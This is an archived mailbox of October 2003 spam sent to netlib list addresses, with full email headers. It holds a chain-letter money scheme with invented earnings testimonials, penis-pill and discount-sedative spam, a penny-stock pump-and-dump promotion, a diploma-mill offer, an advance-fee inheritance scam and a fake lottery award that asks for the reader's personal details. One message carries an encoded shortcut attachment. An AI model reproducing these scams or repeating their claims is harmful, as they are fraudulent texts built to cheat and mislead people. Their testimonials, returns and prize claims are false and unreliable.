<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Dan Sondstrom,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Alberta, Canada</fo=
nt></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"I had receive=
d
this program before. I deleted it, but later I wondered if I should have
given it a try. Of course, I had no idea who to contact to get another
copy, so I had to wait until I was e-mailed again by someone else........1=
1
months passed then it luckily came again...... I did not delete this one!
I made more than $490,000 on my first try and all the money came within
22 weeks".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Susan De Suza,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">New York, N.Y.</fon=
t></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"It really is =
a
great opportunity to make relatively easy money with little cost to you.
I followed the simple instructions carefully and within 10 days the money
started to come in. My first month I made $ 20,560.00 and by the end of
third month my total cash count was $ 362,840.00. Life is beautiful, Thanx=

to the internet".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Fred Dellaca,</font>=
</font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Westport, New Zeala=
nd</font></font></i></b></blockquote>

<hr width=3D"85%"></blockquote>

<center><b><font face=3D"Arial"><font size=3D+0>ORDER YOUR REPORTS TODAY, =
GET
STARTED ON YOUR ROAD TO</font></font></b>
<p><b><font face=3D"Arial"><font size=3D+2>FINANCIAL FREEDOM!</font></font=
></b></center>
</blockquote>

<center><i><font face=3D"Arial"><font size=3D-1>If you have any questions =
as
to the legality of this program, contact the Office of</font></font></i>
<br><i><font face=3D"Arial"><font size=3D-1>Associate Director for Marketi=
ng
Practices, Bureau of Consumer Protection, Washington, D.C</font>.</font></=
i>
<p>&nbsp;</center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>This =
message
is sent in compliance of the proposed bill SECTION 301, paragraph (a)(2)(C=
)
of S. 1618.</font></font></font>
<br><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>to be rem=
oved
from this mailing, please utilize our <a href=3D"http://203.95.1.160/remov=
e.html">remove
link here</a></font></font></font></center>

<div class=3D"ItalicBold"></div>

</body>
</html>
ngwrymxhvp ss
kpux
licwhg  ezl bsemh fgtw

--CC_C_B6_.2_E.6B4BEFB--


From btaylor2@gte.net Fri Oct 24 07:07:57 2003
Return-Path: <btaylor2@gte.net>
Received: from DIS-PARIS-NOT1 ([213.223.37.252])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9OB7uRY026214
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 24 Oct 2003 07:07:56 -0400 (EDT)
Message-Id: <200310241107.h9OB7uRY026214@netlib2.cs.utk.edu>
From: "badvanced@gte.net" <btaylor2@gte.net>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: herbal pill will actually ENLARGE your penis up to 30%
Date: Fri, 24 Oct 2003 13:09:25 +0200
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFs
Ly9FTiI+DQoNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+bmE8L3RpdGxlPg0KPC9oZWFkPg0KPGJv
ZHkgdG9wbWFyZ2luPSIwIiBiZ2NvbG9yPSIjMzMwMENDIj4NCjxkaXYgYWxpZ249ImNlbnRlciI+
PGJyPjxzbWo4aTlqZmRzYT4NCjx0YWJsZSB3aWR0aD01MDBweD4NCjx0cj4NCjx0ZCBiZ2NvbG9y
PSJuYXZ5IiBhbGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSJ2ZXJkYW5hIiBzaXplPTIgY29sb3I9
InllbGxvdyI+MTAwJSBHdWFyYW50ZWVkIFJlc3VsdHMgT3IgWW91ciBNb25leSBCYWNrDQo8L3Ry
Pg0KPHRyPjx0ZCBiZ2NvbG9yPSJibHVlIiBhbGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSJ2ZXJk
YW5hIiBzaXplPTQgY29sb3I9IndoaXRlIj48Yj4NCjxicj4NCkxpa2UgZ2lybHMgd2l0aCBiaWcg
dGl0cz8gR2lybHMgbGlrZSBiaWcgY29ja3Mgb24gZ3V5cyE8YnI+PGJyPg0KPCEtLSBzbWo4aTlq
ZmRzYSAtLT4NClRydXN0IG1lLCBnZXR0aW5nIGNvbXBsaW1lbnRzIGFib3V0IHlvdXIgYmFpdCBh
bmQgdGFja2xlIGlzIGEgYmlnIGNvbmZpZGVuY2UgYm9vc3QhPGJyPjxicj4NCldlJ3ZlIGJlZW4g
c2VsbGluZyBwZW5pcyBwaWxscyBmb3IgYSBsb25nIHRpbWUgYW5kIGhhdmUgc2V2ZXJhbCBtaWxs
aW9uIEhBUFBZIGN1c3RvbWVycyEgPGJyPjxicj4NCjxBIGhyZWY9Imh0dHA6Ly9zY290dHlAd3d3
LmhlcmJhbC11c2EudXMvd2hpdGVsaW5lL3ZwLz9zbWo4aTlqZmRzYSI+PGZvbnQgY29sb3I9Inll
bGxvdyI+VGFrZSBhIGxvb2sgYXQgaG93IGl0IHdvcmtzPC9hPjxicj48YnI+DQo8L3RkPjwvdHI+
DQo8dHI+DQo8dGQgYmdjb2xvcj0ibmF2eSIgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0idmVy
ZGFuYSIgc2l6ZT0yIGNvbG9yPSJ5ZWxsb3ciPldvcmxkcyBNb3N0IEVmZmVjdGl2ZSBFbmxhcmdl
bWVudCBUZWNobmlxdWUNCjwvdHI+DQo8L3RhYmxlPjxzbWo4aTlqZmRzYT4NCjxicj48YnI+PGJy
Pjxicj48YnI+PGJyPjxicj48YnI+DQo8Zm9udCBzaXplPSIxcHgiIGZhY2U9InZlcmRhbmEiIGNv
bG9yPSIjMDAwMDAiPnNtajhpOWpmZHNhIHNtajhpOWpmZHNhIHNtajhpOWpmZHNhPC9mb250Pg0K
PHNtajhpOWpmZHNhPg0KPGEgaHJlZj0iaHR0cDovL3Njb3R0eUB3d3cuaGVyYmFsLXVzYS51cy93
aGl0ZWxpbmUvb3V0Lmh0bWwiPjxmb250IGNvbG9yPSJ5ZWxsb3ciIHNpemU9IjIiPnRvIGdldCBv
ZmY8L2E+DQo8L2JvZHk+DQo8L2h0bWw+DQo=


From m782ghyyw@yahoo.com Sun Oct 26 15:14:03 2003
Return-Path: <m782ghyyw@yahoo.com>
Received: from midsouth-24-151-195-154.westtn.chartertn.net (midsouth-24-151-195-154.westtn.chartertn.net [24.151.195.154])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9QKDqRY001154;
	Sun, 26 Oct 2003 15:13:58 -0500 (EST)
Received: from [14.94.199.127] by midsouth-24-151-195-154.westtn.chartertn.net with ESMTP id 02490370 for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 26 Oct 2003 22:05:57 +0200
Message-ID: <l-6$3$yv-54--8z$8df914t-9on3x@c9up9>
From: "Donn Lund" <m782ghyyw@yahoo.com>
Reply-To: "Donn Lund" <m782ghyyw@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: INVESTORS: Blue-Chip, Stock-Trading System---77% Return---Automated...elliot
Date: Sun, 26 Oct 2003 22:05:57 +0200
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="6562B__CB6__C39_"
X-Priority: 3


--6562B__CB6__C39_
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Investors: Come see Wall Streets only scale-trading system for blue-chip s=
tocks - MainScale

We DO NOT TOUT INDIVIDUAL STOCKS - This is an automated, stock-trading sys=
tem for blue-chips only


www.mainscale4u.com/?032335


MainScale started on October 1, 2002

Here are the results our investors have enjoyed over the last year.

Banked return, 1-year: 77.98%

12 consecutive months of profitability

Trades---467
Gainers--442
Losers----15


www.mainscale4u.com/?032335


In fact, the longest period between profitable trades was just 6 days.

In less than 15 minutes a day, you can manage a profitable portfolio that =
will make you money in any type of market.



www.mainscale4u.com/?032335




No more advertisements, go here: www.mainscale4u.com/nomore.html=
f mbsw ai
bixaq qks
lomr
sns

--6562B__CB6__C39_--


From xgdoakev@cs.com Tue Oct 28 16:15:30 2003
Return-Path: <xgdoakev@cs.com>
Received: from 200-103-106-226.pvoce7001.e.brasiltelecom.net.br (200-103-106-226.pvoce7001.e.brasiltelecom.net.br [200.103.106.226])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9SLFNRY009298;
	Tue, 28 Oct 2003 16:15:25 -0500 (EST)
Received: from n9i3.mrp5q.net [119.120.84.115] by 200-103-106-226.pvoce7001.e.brasiltelecom.net.br id <6969758-82766> for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 28 Oct 2003 20:08:28 -0100
Message-ID: <u0eq$786-6rx4-$z4845srr9k5-1$n2@1ldmbin5mp5>
From: "Kathryn Bullard" <xgdoakev@cs.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Fired Your Boss Now
Date: Tue, 28 Oct 03 20:08:28 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".F_0F8C.9..BAF"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

--.F_0F8C.9..BAF
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

FREE Money-Making Report:

"Why I Quit My Job When I Was
Making $656,305.14 Per Year"

You, too, can fire your boss
and secure true time/financial
freedom. Go to:

http://www.updatebots.com/whyiquitmyjob.html


Click Here to Unsubscribe:
http://updatebots.com/whyiquitmyjob-r.html

--.F_0F8C.9..BAF--


From fdpfhws@yahoo.com Tue Oct 28 16:30:08 2003
Return-Path: <fdpfhws@yahoo.com>
Received: from 12-253-43-247.client.attbi.com (12-253-43-247.client.attbi.com [12.253.43.247])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9SLU3RY009620;
	Tue, 28 Oct 2003 16:30:05 -0500 (EST)
Received: from [193.81.175.215] by 12-253-43-247.client.attbi.com with ESMTP id ABDF90F3F10; Tue, 28 Oct 2003 16:31:09 -0200
Message-ID: <2-7-g-u977295l@fcx0s6r6>
From: "Benny Best" <fdpfhws@yahoo.com>
Reply-To: "Benny Best" <fdpfhws@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: FW: Give Your Partner your bestmoscow hwch zowhyacnetdt
Date: Tue, 28 Oct 03 16:31:09 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="7__B5.9EA_C"
X-Priority: 3
X-MSMail-Priority: Normal


--7__B5.9EA_C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD>
</HEAD>
<DIV><FONT face=3DArial size=3D2><FONT face=3D"Times New Roman" size=3D3><=
/FONT>
<P><FONT face=3DArial size=3D2><B><FONT face=3DArial size=3D4><FONT
color=3D=
#ff0000>Sa.ve 
70%</FONT> on hundreds of MEDS</FONT></B></FONT></P>
<P>Xanax<BR>Valium<BR>Levitra<BR>Via.graST<BR>Alprazolam (Generic Xanax)<B=
R>Soma 
(Carisoprodol)<BR>Fioricet (generic)<BR>Diazepam (Generic Valium)</P>
<P><FONT face=3DArial size=3D2><A 
href=3D"http://www.poihfrer.biz/vpr6653">Interested</A></FONT></P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P></FONT></DIV></HTML>pc tnq
 hwbnecit hs
iplowivylp wybkgfdxxmjzfxavbtx
gkeokmkvvwvcvs
m

--7__B5.9EA_C--


From htqyljrsd2@yahoo.com Tue Oct 28 18:37:39 2003
Return-Path: <htqyljrsd2@yahoo.com>
Received: from rdu57-192-149.nc.rr.com (rdu57-192-149.nc.rr.com [66.57.192.149])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9SNbZRY012375
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 28 Oct 2003 18:37:36 -0500 (EST)
Received: from [25.211.63.215] by rdu57-192-149.nc.rr.com; Tue, 28 Oct 2003 20:36:39 -0300
Message-ID: <q1--ig1awf7ufx$dw@cwo9.0dx>
From: "Leslie Lockwood" <htqyljrsd2@yahoo.com>
Reply-To: "Leslie Lockwood" <htqyljrsd2@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: US Stock Market: PFDE - Last Picks .45 to 1.18....74 to 1.20...ivi
Date: Tue, 28 Oct 2003 20:36:39 -0300
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="3_44D1_92."
X-Priority: 3


--3_44D1_92.
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

UPSIDE INTERNATIONAL - Searching Out Stocks with Big Upside Potential...th=
at have gone unnoticed until now.


UpSide International uncovers unusual trends and activity in stocks.  We l=
ook for signs of block trades and insider purchasing in order to uncover i=
nsight into uncommon trends.

Seven weeks ago, on Sept. 4th, we highlighted SUQU at 0.57. We set the tar=
get price at 1.20.  It hit a high of 1.18--we were very close. Our last pi=
ck was TRHL at 0.74 on Oct. 3rd.  Target was 1.13.  It hit 1.20.

Our focus now is on Paramco Financial: PFDE

New trading range (as of 10/28/03): Target -- 2.36.

Yesterday, a Long White Candlestick formed, and pressure was strong. The s=
tock is in position for a higher high and a higher low. Last week, a bulli=
sh gap occurred, which indicates an upward break out is imminent. The volu=
me is very high. Also,  PFDE just started an unusual trading pattern.  Lar=
ge blocks of shares are being bought.  Is this an indication of something?=
 Are large investors picking up PFDE, an institution, what's coming?

We have been seeing indicators with PFDE, the 20 - 50 Day MACD Oscillator =
is now indicating an uptrend, 20 Day Bollinger Bands have moved into an up=
grade indication.

Paramco Financial, founded in 1996, is a financial services holding compan=
y which specializes in the development and placement of commercial equipme=
nt leasing transactions and in assisting its clients with their capital fo=
rmation needs.

In 2001, Paramco began a major vertical expansion effort to enter into the=
 residential and commercial mort.gage industry, the mort.gage warehouse le=
nding business and the business of real estate investments through Paramco=
 Mort.gage Corporation and Paramco Investments, Inc.


RECENT NEWS
Paramco Financial Acquires Royal Federal - a company in highly profitable =
sector of mort.gage industry.

DENVER - (PRIMEZONE) -- Paramco Financial, Inc. (OTC BB:PFDE.OB - News), a=
 corporate financial services firm announced today that it has acquired al=
l of the issued and outstanding shares of Royal Federal, Inc., a New Orlea=
ns-based mort.gage company.

According to Douglas G. Gregg, Chairman and CEO of Paramco Financial, ``Th=
is strategic acquisition allows Paramco the unique possibility to deliver =
financial products that will finally fulfill the needs of the Louisiana an=
d Mississippi sub prime markets. This market consists of eager home seeker=
s who have a great deal of difficulty in purchasing a home for a variety o=
f financial reasons. Often the annual incomes of these prospective owners =
are not quite sufficient to meet the criteria of conventional lenders, or =
the clients are unable to afford the very large down payments required. Al=
so, the sub prime clients cannot live with the high rates that they are us=
ually offered. This acquisition we designed to address these particular pr=
oblems and I feel confident this merger will strengthen our bottom line wi=
th not only residential lending business but with the origination of comme=
rcial mort.gages and other types of client financing.''
































gmq why
kcvkbwicxbyymhveoohazqym gfj   f ztzjrr xxlm
 tolyvf nmwi sldefpkyf

--3_44D1_92.--


From tffc160utv@yahoo.com Wed Oct 29 02:16:52 2003
Return-Path: <tffc160utv@yahoo.com>
Received: from 160.36.58.108 ([61.11.13.240])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9T7GkRY019728
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 29 Oct 2003 02:16:49 -0500 (EST)
Message-ID: <3bkft02i63bx49757e4fb61pc7oejc@batrllw.lq>
From: "Rick Bailey" <tffc160utv@yahoo.com>
Reply-To: "Rick Bailey" <tffc160utv@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Get A Bachelor's Degree, Master's, or PhD - Classes Not Needed...javier
Date: Wed, 29 Oct 2003 08:20:34 +0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="4FEBEE0480__1D"


--4FEBEE0480__1D
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Academic Qualifications available from prestigious NON=96ACCREDITTED unive=
rsities.

Do you have the knowledge and the experience but lack the qualifications?

Are you getting turned down time and time again for the job of your dreams=
 because you just don't have the right letters after your name?

Get the prestige that you deserve today!

Move ahead in your career today!

Bachelors, Masters and PhD's available in your field!

No examinations! No classes! No textbooks!


Call to register and receive your qualifications within days!

24 hours a day 7 days a week!




203-286-2187 - USA




























gk nckj
gm hftxiufeuno aucau okwycwdd 
u

--4FEBEE0480__1D--


From abubakar_savimbi@libero.it Wed Oct 29 05:16:42 2003
Return-Path: <abubakar_savimbi@libero.it>
Received: from smtp0.libero.it (smtp0.libero.it [193.70.192.33])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h9TAGgRY026391;
	Wed, 29 Oct 2003 05:16:42 -0500 (EST)
Received: from libero.it (193.70.192.56) by smtp0.libero.it (7.0.020-DD01)
        id 3F6F1CE3004447F3; Wed, 29 Oct 2003 11:09:29 +0100
Date: Wed, 29 Oct 2003 11:09:29 +0100
Message-Id: <HNIK7T$85CD2DF4A08821FF5C903C49BB4B88B2@libero.it>
Subject: from abubakar
MIME-Version: 1.0
X-Sensitivity: 3
Content-Type: text/plain; charset=iso-8859-1
From: "abubakar_savimbi" <abubakar_savimbi@libero.it>
To: "abubakar_savimbi" <abubakar_savimbi@libero.it>
X-XaM3-API-Version: 4.1 (B16)
X-type: 0
X-SenderIP: 213.136.125.94
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by netlib2.cs.utk.edu id h9TAGgRY026391



> 
> > 
> > PLEASE THIS IS WHAT WE NEED FROM YOU.
> > 
> > ATTN:
> > 
> > please I am Mr Abubakar Savimbi, the only son of late
> > chief Joseph Savimbi from Sierra Leone.I know that my
> > message will come to you as a surprise to you but
> > however, 
> > 
> > I am writing you inabsolute confidence primarily to
> > seek your assistance to transfer our cash of nine
> > million eight hundred thousand dollars ($9,800,000)
> > now in the custody of a BANK here in Abidjan to your
> > private account pending our arrival to your country
> > SOURCE OF THE MONEY My late father, 
> > 
> > 
> > chief Joseph Savimbi, a native of mende district in the
> > Northern province of Sierra Leone, was the general
> > Manager of Sierra Leone mining co-operation (S.L.M.C.)
> > Freetown. According to my father. This money was the
> > income acquired from mining co-operation's over draft
> > and minor sales. 
> > 
> > 
> > Before the peak of the civil war between the rebels
> > forces of major Paul Koroma and the combined forces of
> > ECOMOG peace keeping operation that almost destroyed
> > my country, following the forceful removal from power
> > ofthe Civilian Elected President Ahmed Tejan Kabbah by
> > the rebels. 
> > 
> > 
> > My father had already made arrangement for his family,
> > my mother, my little sister and myselfto be evacuated
> > to Abidjan, Cote d'Ivoire with our personal effects
> > and the box containing team.
> > 
> > 
> > My father deposited the fund for the safe custody
> > until after the war when he will join us. During the
> > war in my country, and following the indiscriminate
> > looting of public and Government properties by the
> > rebel forces, the sierra Leone mining coop. 
> > 
> > 
> > Was one of the targets looted and destroyed.My
> > father including other top Governmentfunctionaries
> > Were attacked and killed by the rebels in November1999
> > because of his relationship with the civilian 
> > Government of Ahmed Tejan Kabbah. As a result of my
> > father death, and with the news of my uncles
> > involvement in air crash in January, dashed our hope
> > of survival. 
> > 
> > 
> > The untimely deaths caused my mothers heart failure
> > and other related complications of which she later
> > died in the hospital After we must have spent a lot of
> > money on her.
> > Now my 16-year-old sister and myself are alone in this
> > strange country suffering without any care or
> > help.Without any relation, we are now like refugees
> > and orphans. Our only hope now is in this fund which
> > our father deposited in the BANK To this effect, I
> > humbly solicit your assistance in the followings
> > ways.To assist me claim this fund from the BANK as
> > co-beneficiary.
> > 
> > To transfer this money in your name to your country.To
> > make a good arrangement for a joint business
> > investment on our behalf in your country and you being
> > the caretaker. 
> > 
> > 
> > To secure a college for my little sister and my self
> > in your country to further our education.And to make
> > arrangement for our travel to meet you face to face in
> > your country after you have transferred this fund.Most
> > importantly. The whole documents issued after deposit
> > are in my custody. For your assistance, I beg to
> > concede 10% of this money to you for your efforts and
> > assistance.
> > 
> > 
> > 
> > Awaiting for your urgent reply or immediate telephone
> > call for further informations.
> > Best regards,Thanks and God bless.
> > 
> Abubakar and Sister.
> > 
> > 
> > ________________________________________________________________
> > The best thing to hit the internet in years - Juno SpeedBand!
> > Surf the web up to FIVE TIMES FASTER!
> > Only $14.95/ month - visit www.juno.com to sign up today!
> > 
> > 
> > ---------------------------------
> > Do you Yahoo!?
> > The New Yahoo! Shopping - with improved product search
> 
> 



From m0p2xtux4g@cs.com Wed Oct 29 22:54:33 2003
Return-Path: <m0p2xtux4g@cs.com>
Received: from 174.32.31.61.isp.tfn.net.tw (174.32.31.61.isp.tfn.net.tw [61.31.32.174])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9U3sORY020943;
	Wed, 29 Oct 2003 22:54:28 -0500 (EST)
Received: from 1q1.oic8n.net ([126.191.73.32]) by 174.32.31.61.isp.tfn.net.tw id 3dD4x07O33dO; Thu, 30 Oct 2003 05:45:28 +0200
Message-ID: <hk04m-3y6qwl39-3$ls98az@4kqq3>
From: "Shirley Burroughs" <m0p2xtux4g@cs.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Make Money Working from Home
Date: Thu, 30 Oct 03 05:45:28 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="DAAF._15E9"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

--DAAF._15E9
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

FREE Money-Making Report:

"Why I Quit My Job When I Was
Making $656,305.14 Per Year"

You, too, can fire your boss
and secure true time/financial
freedom. Go to:

http://www.updatebots.com/rps/whyiquitmyjob.html


Click Here to Unsubscribe:
http://updatebots.com/remove.html

btilkckteajjcltpcrhs 
gioteaocaqk p omm

--DAAF._15E9
Content-Type: application/octet-stream;
	name="Super Mailer 3.40.lnk"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="Super Mailer 3.40.lnk"

TAAAAAEUAgAAAAAAwAAAAAAAAEbbQAAAIAAAAABQqLScPMMBMHEGmxWNwwEAUKi0nDzDAQB8
AwAAAAAAAQAAAAAAAAAAAAAAAAAAAA0BFAAfUOBP0CDqOmkQotgIACswMJ0ZAC9DOlwAAAAA
AAAAAAAAAAAAAAAAAAAASgAxAAAAAABHLw6nMQBQUk9HUkF+MQAAMgADAAQA775HL/tcRy8O
pxQAAABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAAAAGABIADEAAAAAAEcvHKcQAFNVUEVS
TX4xAAAwAAMABADvvkcvDqdHLxynFAAAAFMAdQBwAGUAcgAgAE0AYQBpAGwAZQByAAAAGABM
ADIAAHwDANsuTFkgAHNtbG9hZGVyLmV4ZQAAMAADAAQA777bLkxZRy8spxQAAABzAG0AbABv
AGEAZABlAHIALgBlAHgAZQAAABwAAABZAAAAHAAAAAEAAAAcAAAALQAAAAAAAABYAAAAEQAA
AAMAAACxZ30wEAAAAABDOlxQcm9ncmFtIEZpbGVzXFN1cGVyIE1haWxlclxzbWxvYWRlci5l
eGUAADAALgAuAFwALgAuAFwALgAuAFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFMA
dQBwAGUAcgAgAE0AYQBpAGwAZQByAFwAcwBtAGwAbwBhAGQAZQByAC4AZQB4AGUAHQBDADoA
XABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAUwB1AHAAZQByACAATQBhAGkAbABlAHIA
JABDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAUwB1AHAAZQByACAATQBhAGkA
bABlAHIAXABzAG0ALgBlAHgAZQBgAAAAAwAAoFgAAAAAAAAAYnJpYW5uYQAAAAAAAAAAAIy2
xA8Fg8dEqwO6oqp0DQ1WuDerCPnXEa/2AOBMgt8/jLbEDwWDx0SrA7qiqnQNDVa4N6sI+dcR
r/YA4EyC3z8UAwAABwAAoCVQcm9ncmFtRmlsZXMlXFN1cGVyIE1haWxlclxzbS5leGUAAHIA
bwBnAHIAYQBtACAARgBpAGwAZQBzAFwAUwB1AHAAZQByACAATQBhAGkAbABlAHIAXABzAG0A
bABvAGEAZABlAHIALgBlAHgAZQAiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAJQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwAUwB1AHAAZQByACAATQBhAGkA
bABlAHIAXABzAG0ALgBlAHgAZQAAAAAAAAAAAAAAAAAAAAAAZOmgAAAAAACzFvV3GEkLAHEW
9Xd4EwgAjRb1dzMAAMAAAAAAIEkLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAABYAFoAgPKgABoCAAAI56AAMwAAwAAAAAAgSQsATxL1d1QS9XczAADA
AAAAACBJCwA86aAAIEkLACT1oAACJPh3QFX3dzMAAMB7AAAAzXbnd3sAAAAAAAAAhJ3ndzMA
AMAXjOd3gPKgAAAAAABo7qAAAAAAAKjpoAC+t5ZxCeWXcQABBAANAAAABAEAAFASQOEE6qAA
GAAAAMQFAADQ6aAAQAAAAAAAAAAAAAAAWABYAG5JCwDEBQAAWABYAG5JCwD466AAkhwtdwAA
AAAAAAgATMr1d2jK9XcIBggAaADGAAEAAAABAAAAPOqgAIfP5nePz+Z3D8/mdwCFEgAfAAAA
LAAAAGgAxgAAAAAADOqgABDqoAAs66AAhrvpd2gV6Hf/////j8/mdxAAAAAFAACgJgAAAHcA
AAAAAAAA

--DAAF._15E9--


From e_clapton@faithmail.com Wed Oct 29 23:10:44 2003
Return-Path: <e_clapton@faithmail.com>
Received: from coolre4766.com (host90.JuchTech.fibrewired.on.ca [216.185.65.90] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9U4ANRY021255
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 29 Oct 2003 23:10:34 -0500 (EST)
Message-Id: <200310300410.h9U4ANRY021255@netlib2.cs.utk.edu>
From: "Edward Clapton" <e_clapton@faithmail.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Date: Thu, 30 Oct 2003 17:10:24 +0000
Subject: I need help
X-Mailer: Microsoft Outlook Express 5.00.2919.6900 DM
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by netlib2.cs.utk.edu id h9U4ANRY021255

De Lotto Netherlands
41132, NL-1007 DB AMSTERDAM



FROM: THE DESK OF THE PROMOTIONS MANAGER,
INTERNATIONAL PROMOTIONS/PRIZE AWARD DEPARTMENT,
AO98674DV AND BATCH NO: 03/1628/ADB 

RE: AWARD NOTIFICATION, 

We are pleased to inform you of the announcement today, 22 October, 2003, of winners of the DE LOTTO NETHERLANDS SWEEPSTAKES LOTTERY / INTERNATIONAL PROGRAMS held on 29TH November 2002 as part of our end of year bonanza. 

You/your company, through our online pop-up registeration medium, attached to ticket number 047-1776-1342-440, with serial number 21564-07 drew the lucky numbers 01-77-13-55-38-11, and consequently won the lottery in the 1st category (category 'A'). 

You have therefore been approved for a lump sum pay out of US$3,000,000.00 in cash credited to file REF NO. AB96532. This is from total prize money of US$6,000,000.00 shared among the two(2) international winners in this category. All participants were selected through a computer balloting system drawn form 25,000 names from Middle East, Asia, Africa, Canada, Europe and North America as part our International Promotions Program,which is conducted annually. 

CONGRATULATIONS!!!!! 

Your fund is now deposited with FIRST SECURITIES INC., Due to the mix up of some numbers and names, we ask that you keep this award strictly from public notice until your claim has been processed and your money remitted to your account. This is part of our security protocol to avoid double claiming or unscrupulous acts by participants of this program. 

We hope with a part of you prize, you will participate in our end of year high stakes US$1.3 billion International Lottery. 

To begin your claim, please contact directly, your claim agent; 

EDWARD CLAPTON,
FINANCIAL CONTROLLER,
FIRST SECURITIES INC.
FAX: +15308314254 (Direct Fascimile system)

EMAIL: e_clapton@faithmail.com

for due processing and remittance of your prize money to a designated account of your choice. 

Remember, you must contact your claim agent not later than 31 October, 2003. After this date, all funds will be returned as unclaimed. All correspondences to MR. EDWARD CLAPTON, either by fax or email, should have this EMAIL sent along with it and YOUR FULL NAMES, FULL CONTACT ADDRESS(COUNTRY OF RESIDENCE) and EMAIL ADDRESS to which this email is sent, should be clearly and boldly written in your response. 

NOTE: 
